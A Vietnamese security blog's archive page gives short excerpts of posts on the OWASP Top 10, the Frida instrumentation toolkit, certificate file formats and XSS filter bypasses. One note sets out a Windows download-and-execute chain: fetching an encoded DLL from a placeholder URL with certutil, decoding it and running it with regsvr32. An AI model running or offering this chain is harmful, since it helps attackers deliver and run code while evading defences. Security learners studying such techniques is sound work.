Category Archives: nhattruong.blog

Top 10 lỗ hổng bảo mật web phổ biến theo chuẩn OWASP – OWASP TOP 10 (2013)

(Bài viết được tham khảo tại Top 10 lỗ hổng bảo mật web phổ biến theo chuẩn OWASP – OWASP TOP 10 – CyStack Resources) Lưu ý: OWASP TOP 10 này từ năm 2013, chưa update nhưng vẫn rất hữu ích với người mới OWASP là một tiêu chuẩn toàn cầu để phục vụ việc kiểmContinueContinue reading “Top 10 lỗ hổng bảo mật web phổ biến theo chuẩn OWASP – OWASP TOP 10 (2013)”

Frida toàn tập [Part 1]

I. Giới thiệu về Frida Frida tương tự như Greasemonkey tool (trên firefox) cho native app, về mặt kỹ thuật, nó được gọi là dynamic code instrumentation toolkit. Nó cho phép ta inject một đoạn mã JavaScript hoặc một thư viện ta tự tạo vào trong native app trên bất kỳ hệ điều hành nàoContinueContinue reading “Frida toàn tập [Part 1]”

Các định dạng tệp cho chứng chỉ số

Giới thiệu PKCS # 12 (còn được gọi là PKCS12 hoặc PFX) là định dạng nhị phân để lưu trữ chuỗi chứng chỉ và khóa riêng trong một tệp mã hóa duy nhất. Các tệp PKCS # 12 thường được sử dụng để nhập và xuất chứng chỉ và khóa riêng trên máy tính WindowsContinueContinue reading “Các định dạng tệp cho chứng chỉ số”

[Note] tải file windows với Certutil

copy: http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html 1. Create your DLL 2. Base64encode it (optional) 3. Use certutil.exe -urlcache -split -f http://example/file.txt file.blah to pull it down   4. Base64decode the file with certutil 5. Execute the dll with regsvr32 regsvr32 /s /u mydll.dll

Một số cách bypass XSS filter

Sau đây là một số cách bypass XSS filter dị dị sưu tầm được, anh em có thể trải nghiệm. “Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phépContinueContinue reading “Một số cách bypass XSS filter”